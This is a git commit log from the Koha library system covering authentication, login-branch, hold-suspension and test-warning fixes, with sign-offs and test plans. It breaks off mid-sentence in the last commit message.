4 months ago Bug 36575: (QA follow-up) Shibboleth POD and checkpw_internal call
Marcel de Rooy [Tue, 30 Apr 2024 14:39:36 +0000 (14:39 +0000)]
Bug 36575: (QA follow-up) Shibboleth POD and checkpw_internal call

Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
4 months ago Bug 36575: Adjust checkpw_internal to return patron
Nick Clemens [Wed, 24 Apr 2024 15:06:22 +0000 (15:06 +0000)]
Bug 36575: Adjust checkpw_internal to return patron

This patch refactors checkpw_internal to remove the SQL code, use patron objects, and return the
patron that correctly matches the userid/cardnumber when auth is successful

Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
4 months ago Bug 36575: (bug 34893 follow-up) Return patron when autocreating in Shibboleth
Nick Clemens [Wed, 24 Apr 2024 14:25:40 +0000 (14:25 +0000)]
Bug 36575: (bug 34893 follow-up) Return patron when autocreating in Shibboleth

Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
4 months ago Bug 36575: (bug 34893 follow-up) Return patron from LDAP
Nick Clemens [Wed, 24 Apr 2024 14:23:51 +0000 (14:23 +0000)]
Bug 36575: (bug 34893 follow-up) Return patron from LDAP

Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
4 months ago Bug 36575: (QA follow-up)
Martin Renvoize [Thu, 11 Apr 2024 10:18:30 +0000 (12:18 +0200)]
Bug 36575: (QA follow-up)

Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
4 months ago Bug 36575: Return correct patron when there is a shared userid / cardnumber
Nick Clemens [Thu, 11 Apr 2024 09:39:03 +0000 (09:39 +0000)]
Bug 36575: Return correct patron when there is a shared userid / cardnumber

This patch moves some patron fetching code in C4/Auth to use the patron returned from the validation
methods and only try to fetch the patron (to check if locked, update attempts, etc) if we didn't authenticate

To test:
1 - Set a user to have userid = BANANA password = Password1
2 - Set a user to have cardnumber = BANANA password = Password2
3 - Hit the patron authentication API:
    http://localhost:8080/api/v1/auth/password/validation
    with data:
    { "identifier": "BANANA", "password":"Password1" }
    and:
    { "identifier": "BANANA", "password":"Password2" }
4 - Note you receive the same response for both
5 - Apply patch, restart all
6 - Repeat the API and confirm you get the correct patron for the password submitted

Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
4 months ago Bug 36575: Unit tests for checkpw_shib
Tomas Cohen Arazi [Thu, 30 May 2024 16:15:09 +0000 (16:15 +0000)]
Bug 36575: Unit tests for checkpw_shib

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
4 months ago Bug 36575: Unit tests for checkpw_ldap
Tomas Cohen Arazi [Thu, 30 May 2024 14:51:11 +0000 (14:51 +0000)]
Bug 36575: Unit tests for checkpw_ldap

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36792: Limit POSIX imports
Janusz Kaczmarek [Mon, 6 May 2024 12:06:22 +0000 (12:06 +0000)]
Bug 36792: Limit POSIX imports

Marcel's QA patch to Bug 36552 added use POSIX; in two spots.
In https://metacpan.org/pod/POSIX we read:

CAVEATS
Everything is exported by default (with a handful of exceptions). This is
an unfortunate backwards compatibility feature and its use is strongly
discouraged. You should either prevent the exporting (by saying use
POSIX ();, as usual) and then use fully qualified names (e.g.
POSIX::SEEK_END), or give an explicit import list. If you
do neither and opt for the default (as in use POSIX;), you will
import hundreds and hundreds of symbols into your namespace.

This patch fixes this.

No test plan.

Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 8d9ccd6fc371877fbd4d016ee3bc1de54721787e)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit ca023b334cc9b79cfd85e6bb9a75c7037ae1fd95)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 34263: (QA follow-up): Use flatpickr .clear instead
Pedro Amorim [Fri, 3 May 2024 14:22:13 +0000 (14:22 +0000)]
Bug 34263: (QA follow-up): Use flatpickr .clear instead

Signed-off-by: Pedro Amorim <pedro.amorim@ptfs-europe.com>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 1137793e44ce6b5d2a4e7759e46218f6ddeb9e8b)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit dcddcda37d1efb586cb75a89df4ad6af0bf438ee)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 34263: Suspending holds consecutively populates previously used date falsely
Katariina Pohto [Thu, 2 May 2024 13:09:39 +0000 (16:09 +0300)]
Bug 34263: Suspending holds consecutively populates previously used date falsely

Suspending a hold doesn't clear the date from the date picker. When another hold is suspended
the previously used date will show on the date picker but the value is not set on the hold.
Suspending the hold will suspend it indefinitely. Also the link "Clear date to suspend indefinitely"
will not clear the date picker. This patch will make both the Suspend button and the Clear date link
clear the dates from both the date picker and the variable passed on, making the suspending consistent
with what is seen on the date picker.

Test plan:
1) Place 3 holds on a patron.
2) Suspend a hold and set a date for it.
3) Suspend a second hold and notice the previously used date is shown on the date picker.
   Note that the hold will be suspended indefinitely.
4) Open the suspending window for the third hold and pick a date. Click "Clear date to suspend indefinitely"
   and note the date picker doesn't get cleared. The hold will be suspended indefinitely.
5) Apply patch.
6) Suspend a hold and set a date for it.
7) Suspend a second hold and notice the date picker does not have a preset date.
8) Pick a date and clear it with the "Clear date to suspend indefinitely link".
   See that the date picker also gets cleared.

Signed-off-by: Pedro Amorim <pedro.amorim@ptfs-europe.com>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 0f0479e87aaa324b455fbbf40674f15e2fa862c0)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 44a26cbec7d63d873c0b13cbd8097138431480d0)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36939: Remove a warning from Serials.t
Jonathan Druart [Thu, 23 May 2024 07:50:59 +0000 (09:50 +0200)]
Bug 36939: Remove a warning from Serials.t

t/db_dependent/Serials.t .. 2/57 Use of uninitialized value in numeric gt (>) at /kohadevbox/koha/C4/Serials.pm line 2029.

Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 7d75ec3e2602dcadbb238dfb7cbec76020ebafef)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit f41e7398857cc9f76c0bcdf01e3426c192e773e0)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36923: Remove warnings from Holds/LocalHoldsPriority.t
Jonathan Druart [Wed, 22 May 2024 12:01:28 +0000 (14:01 +0200)]
Bug 36923: Remove warnings from Holds/LocalHoldsPriority.t

t/db_dependent/Holds/LocalHoldsPriority.t .. 1/7 Use of uninitialized value in numeric gt (>) at /kohadevbox/koha/C4/Reserves.pm line 866.
t/db_dependent/Holds/LocalHoldsPriority.t .. 2/7 Use of uninitialized value in numeric gt (>) at /kohadevbox/koha/C4/Reserves.pm line 866.
Use of uninitialized value in numeric gt (>) at /kohadevbox/koha/C4/Reserves.pm line 866.
Use of uninitialized value in numeric gt (>) at /kohadevbox/koha/C4/Reserves.pm line 866.
t/db_dependent/Holds/LocalHoldsPriority.t .. 5/7 Use of uninitialized value in numeric gt (>) at /kohadevbox/koha/C4/Reserves.pm line 866.
t/db_dependent/Holds/LocalHoldsPriority.t .. ok
All tests successful.

We didn't have the default values generated by the DBMS

Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 6827c9061ffc57c2e1f7087aced8ce2e65196558)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 233e92f8996958e66363557daec1859a4f76c93b)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36589: Advanced cataloging - restore the correct height of the clipboard
Phil Ringnalda [Thu, 16 May 2024 20:54:41 +0000 (13:54 -0700)]
Bug 36589: Advanced cataloging - restore the correct height of the clipboard

A simple direct fix for the height of the advanced editor's clipboard,
which is a <select size="10"> that's currently cut down to the height of
one thick line by CSS intended for non-multiple, non-sized selects with
dropdown menus.

Test plan:
1. Set the pref EnableAdvancedCatalogingEditor to Enable
2. Cataloging -> Advanced editor
3. Note the Clipboard is a single line tall
4. Apply patch, shift+reload Advanced editor
5. Note the Clipboard is ten lines tall

Signed-off-by: Owen Leonard <oleonard@myacpl.org>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 10a8dc5108dc58d91786ead95f5130a7a147d5b1)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 0413d06b0e0f9e2bb8ec3bf26a55d445a7df7119)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36943: (follow-up) 24.05.00 - Update .mailmap
Katrin Fischer [Thu, 23 May 2024 17:11:33 +0000 (17:11 +0000)]
Bug 36943: (follow-up) 24.05.00 - Update .mailmap

Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit f044310808bd26fb856ed26e78290f972889a9cc)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 57ec82f6e86a230a6ace571e7c5e54e8ddf702fc)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36943: 24.05.00 - Update .mailmap
Martin Renvoize [Thu, 23 May 2024 10:47:05 +0000 (11:47 +0100)]
Bug 36943: 24.05.00 - Update .mailmap

Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit d8863160da07c81b0b7356c8b923737b401db481)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 6c89d4eeb6348683d32a1928a2e410e3f81c44fe)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36908: (Rmaint follow-up) Fix number of tests
Lucas Gass [Fri, 31 May 2024 15:27:24 +0000 (15:27 +0000)]
Bug 36908: (Rmaint follow-up) Fix number of tests

Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36908: (QA follow-up) Proposed improvement to preference description
Martin Renvoize [Thu, 23 May 2024 09:36:55 +0000 (10:36 +0100)]
Bug 36908: (QA follow-up) Proposed improvement to preference description

I found the initial addition of 'or the branch chosen at login' to the
system preference description more misleading than the original. After
discussion on mattermost and with training staff here at PTFS the best
alternative we could come up with is proposed here.

Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 85735e86f4f927d8e455aec08ef90a1381694059)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit b478d91b59a11574b0fd7689b5037c2c29ee8d42)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36908: Sort branches based on branchcode
Nick Clemens [Tue, 21 May 2024 12:44:25 +0000 (12:44 +0000)]
Bug 36908: Sort branches based on branchcode

This adds a sort based on branchcode, it's a fallback for an edge case that should be rare
so I think is acceptable, as long as documented.

I added test coverage, but it may no longer be possible to encounter this scenario.

System preference descriptions are updated as well.

Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 46cecfdd72ee45bfad03c6875fdc078df48eabec)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 7682763fca0e1d14c27a32e9987e8c66712229cb)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36908: Additional unit tests to identify flaw when two branches have same IP
Nick Clemens [Tue, 21 May 2024 12:26:34 +0000 (12:26 +0000)]
Bug 36908: Additional unit tests to identify flaw when two branches have same IP

This could be considered a configuration flaw, but when:
StaffLoginBranchBasedOnIP enabled and not AutoLocation
or
AutoLocation enabled and no IP set in user's branch

AND

two branches have the same IP set

the user can be logged in randomly to one of the matching branches.

These tests often pass, but will also randomly fail.

Easier to verify with a one liner demonstrating current code:
perl -e 'use Koha::Libraries; use List::MoreUtils qw(uniq); my $branches = { map { $_->branchcode => $_->unblessed } Koha::Libraries->search->as_list }; my $branchcode="CPL"; warn Data::Dumper::Dumper( uniq( $branchcode, keys %$branches ));'

Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 7e8803537254ec950c64327bece8091e6cf49499)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit aa1c4c0281039749fa024687049b32b375d78ec6)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36908: Expand, clarify, and tidy tests for AutoLocation
Nick Clemens [Tue, 21 May 2024 12:14:50 +0000 (12:14 +0000)]
Bug 36908: Expand, clarify, and tidy tests for AutoLocation

Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 6966fcc398d3a87edba95aa987d915a1b00eb08f)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 15bf32a50a9c4cfff9e7b8b139f7fb639e90b331)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36924: Remove warning "Value not allowed for auto_incr itemnumber in Item"
Jonathan Druart [Thu, 23 May 2024 06:49:39 +0000 (08:49 +0200)]
Bug 36924: Remove warning "Value not allowed for auto_incr itemnumber in Item"

We are removing entirely the badly written test.

Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Note: We cannot test this properly when the search index refers to biblios
and items that do not exist in the database.
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 12511385289b41c3c3d067f1b7c4397010e3d27c)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 98fa5f6b25360e056dac72a776e880ec2c4d4970)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36924: Remove "I don't know what to say" warnings
Jonathan Druart [Wed, 22 May 2024 12:05:45 +0000 (14:05 +0200)]
Bug 36924: Remove "I don't know what to say" warnings

Those are a pain really

Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit a77d74b903951af569e73e09c5c9c33f0e6aa818)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 78d1f934c2ad5088bde0bd199c47a2627ad09f8e)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36665: (RMaint follow-up) adapt unit test
Fridolin Somers [Wed, 29 May 2024 14:40:41 +0000 (16:40 +0200)]
Bug 36665: (RMaint follow-up) adapt unit test

(cherry picked from commit 8ddb0797f66168765c80df8372a588e1885ff21c)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36665: (follow-up) Default preference to enabled
Nick Clemens [Thu, 23 May 2024 15:14:51 +0000 (15:14 +0000)]
Bug 36665: (follow-up) Default preference to enabled

While this is a new preference, this was the standard behavior for a long time. I think we should
default to enabled to restore previous behavior.

Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit e48e3d02f301ecf9402812120ca333c91d84d5c5)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit a479192e6745e6f452c0f2b08ce0ff473f19135c)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36665: DBRev 23.05.11.002
Lucas Gass [Fri, 31 May 2024 13:51:49 +0000 (13:51 +0000)]
Bug 36665: DBRev 23.05.11.002

Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36665: (follow-up) Rephrase system preference description
Katrin Fischer [Wed, 22 May 2024 14:14:32 +0000 (14:14 +0000)]
Bug 36665: (follow-up) Rephrase system preference description

... and replace some branches with libraries.

Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 0d4ee5319875439d2309bfae5d7f0054d2d02194)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit a6b9845ecf127768729a40ddb3872141adde6522)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36665: (follow-up) Allow choosing a branch with no IP when using AutoLocation
Nick Clemens [Wed, 22 May 2024 13:08:43 +0000 (13:08 +0000)]
Bug 36665: (follow-up) Allow choosing a branch with no IP when using AutoLocation

Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 58a75cafd6934f2a1b938aac12493bdb7bb53724)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 190fc91e2980c94b3c2540aae0e668fd66e551f6)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36665: (follow-up) Wrap code block in type ne 'opac' conditional
Nick Clemens [Tue, 21 May 2024 11:19:14 +0000 (11:19 +0000)]
Bug 36665: (follow-up) Wrap code block in type ne 'opac' conditional

Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit fb45438ae3a95586107fdf34e03a6803714b25de)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 031896d58bffda13bc24c33515e0711814dba725)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36665: Add option to set the staff user's logged in branch based on their current ip
Nick Clemens [Fri, 17 May 2024 11:59:21 +0000 (11:59 +0000)]
Bug 36665: Add option to set the staff user's logged in branch based on their current ip

This patch adds a new system preference StaffLoginBranchBasedOnIP which restores the behaviour before bug 35918
of using the current IP to determine the user's logged in branchcode

To test:
 1 - Get your current ip
 2 - Set that IP for a library in the administration section
 3 - Find a user account assigned to a different library that can login to staff side
 4 - Login to staff as that user, select 'My library'
 5 - You are logged in to the user's branch
 6 - Apply patch, restart all
 7 - Log out and back in, selecting 'My library'
 8 - You are logged in to the user's branch
 9 - Enable new system preference StaffLoginBranchBasedOnIP
 9 - Log out and back in, selecting a different branch, noting the new warning below the library selection
10 - You are logged in to the branch with the matching IP
11 - Log out and back in, selecting 'My library'
10 - You are logged in to the branch with the matching IP
11 - Change your logged in branch
12 - Verify the selection sticks and you can perform staff actions in the chosen branch
13 - Change the IP of the library to one that doesn't match yours
14 - Verify you can log out and log back in and that selected branch is respected when your IP doesn't match library IP

Signed-off-by: Kristi Krueger <KKRUEGER@cuyahogalibrary.org>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 3a0d6f5d07b914ab03f9ae3c56b033158bd91130)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 6f4632ef04365436079a78b3b0e23bd34536d972)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36858: Remove warnings
Jonathan Druart [Wed, 22 May 2024 07:24:06 +0000 (09:24 +0200)]
Bug 36858: Remove warnings

Argument "" isn't numeric in int

Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 678e3f6e208ed47820132215806519f5162545fb)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 4c4349dbdb1ce156320909d5f9527d2206a80c9e)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36858: Check page parameter for virtual shelves
Marcel de Rooy [Tue, 21 May 2024 14:20:18 +0000 (14:20 +0000)]
Bug 36858: Check page parameter for virtual shelves

Test plan:
Try passing page=x now and verify different behavior (no 500).

Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 90f011355735d16af8cdf6ef224ccf8074ad94e1)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit d903ffd4e61689ddcac0f4cd046d2b9f800859f3)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36914: Remove DBIC warning in shelves.pl
Jonathan Druart [Wed, 22 May 2024 07:35:55 +0000 (09:35 +0200)]
Bug 36914: Remove DBIC warning in shelves.pl

Same fix as Bug 28561: Remove DBIC warning in opac-shelves
But for staff

Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit f388b99af044be538b62c9e850e341cad064ab95)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 509fd15d26a7c84563c73c12538aea54ee7c078e)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 35929: Remove extra parenthesis
Jonathan Druart [Wed, 22 May 2024 07:52:04 +0000 (09:52 +0200)]
Bug 35929: Remove extra parenthesis

and make it more readable

Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit ad41c672a13f8e18ea2fbbc4ad3245165693c339)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit ae53cf4eea2fb401bae6fad487b779002aa05789)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 35929: Don't record a change for empty fields submitted in patron form
Nick Clemens [Wed, 1 May 2024 18:19:42 +0000 (18:19 +0000)]
Bug 35929: Don't record a change for empty fields submitted in patron form

This is reminiscent of bug 36159 - when a field is submitted as empty, and null in the DB
we need to reject this as a change. I tried to copy the logic from that bug, as well as
deleting submitted changes for hidden fields (from html manipulation)

This should be tested extensively. One note: If you submit a valid change request, then submit a second with no change the second will be ignored, but the first will remain. i.e. if you change your name from 'Nick' to 'Nack' - then realize your typo you cannot submit a new request to change it back until the initial request is cleared

To test:
1 - Play with PatronSelfModificationBorrowerUnwantedField and PatronSelfModificationMandatory field to have some fields set
2 - Add a patron attribute, or several, that are editable in the OPAC
3 - Try submitting a form with no changes, note a modification request is submitted
4 - Approve the request
5 - Apply patch, restart all
6 - Try submitting a blank request, you are notified there were no changes
7 - Try to force an unwanted field via html modification
8 - No changes reported
9 - Confirm attributes changes are successful
10 - After a successful request, try submitting a blank request
11 - Note no changes are recorded, but the initial request is still active

Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit cf4a3667cbeb4dbb6b7dd74fd30a3cacca540603)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 1a898d94649f13e76e094c14ad41395f2bd19c9a)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36845: Do not loop over the content attribute
Jonathan Druart [Mon, 20 May 2024 11:34:24 +0000 (13:34 +0200)]
Bug 36845: Do not loop over the content attribute

We skip it.

Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 68e317bd0f8daf967a8af540056e8637524e5d3b)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit aed7e0849634a70880fa09029d018cd053cd9fac)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36845: Exclude meta tag from the translations
Jonathan Druart [Tue, 14 May 2024 07:29:02 +0000 (09:29 +0200)]
Bug 36845: Exclude meta tag from the translations

This bug originally wants to get rid of "noindex" coming from this meta
tag:
  <meta name="robots" content="noindex">

But actually we have other strings from the meta tags that should not be
translated.

Test plan:
0. Do not apply this patch
1. cd misc/translator/po && gulp po:update --lang es-ES (or any other
   lang)
2. git commit -a -m"wip"
3. Apply this patch
4. Repeat 1 and git diff to show the diff
Notice that strings that should not be translated are removed from the
po files (actually commented)

Signed-off-by: Caroline Cyr La Rose <caroline.cyr-la-rose@inlibro.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit fbb123b12eab123e62c508944fd2b6261fb24acf)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit b3dfb82bd030aefb2299fd6e00d31588dbdcffb4)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36892: Fix label for 'is_standing' input
Thibaud Guillot [Fri, 17 May 2024 09:13:21 +0000 (11:13 +0200)]
Bug 36892: Fix label for 'is_standing' input

Test plan:

1) Go to acqui/histsearch.pl and look for "search_children_too" with
   dev tools console.
2) On 'is_standing' input, the same label is used
3) Apply this patch and reload it
4) Now it's correct

Sponsored by: BibLibre

Signed-off-by: Owen Leonard <oleonard@myacpl.org>
Signed-off-by: Pedro Amorim <pedro.amorim@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 40900343673c280d092de9c57399a77c113b41ba)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit dacd7fabbe318ad3c340dd5cc1d35b2e67c040d8)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36856: Fix MARC subfield name in new order from existing bibliographic record
Fridolin Somers [Tue, 14 May 2024 09:41:57 +0000 (11:41 +0200)]
Bug 36856: Fix MARC subfield name in new order from existing bibliographic record

In form of the bibliographic details when adding an order 'From an existing record' in a basket, the marc subfield name is not shown.
The template calls [% field.lib | html %] but this comes from Koha::UI::Form::Builder::Biblio generate_subfield_form() which gives 'marc_lib'.

Test plan:
1) Be sure to have an ACQ biblio framework
2) Enable system preference UseACQFrameworkForBiblioRecords
3) Go to an acquisition basket
4) Add a term in 'From an existing record' and submit
5) On first result click on 'Add order'
6) Look at 'Catalog details'
=> Without patch you only see subfield tag and letter : (123a)
=> With patch you also see subfield name : Name (123a)

Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
Signed-off-by: Pedro Amorim <pedro.amorim@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 5080eecc2268c2b7b88856800e728041c2fc29ec)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 33370ea55b34b234d8d0f05e84dd03dc5d4313aa)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months ago Bug 36834: (Bug 29697 follow-up) Koha explodes when trying to open in Labeled MARC...
Janusz Kaczmarek [Sat, 11 May 2024 08:41:04 +0000 (08:41 +0000)]
Bug 36834: (Bug 29697 follow-up) Koha explodes when trying to open in Labeled MARC view a bibliographic record with an invalid biblionumber

After changes made in catalogue/labeledMARCdetail.pl with the bug 29697
when trying to open the Labeled MARC view with
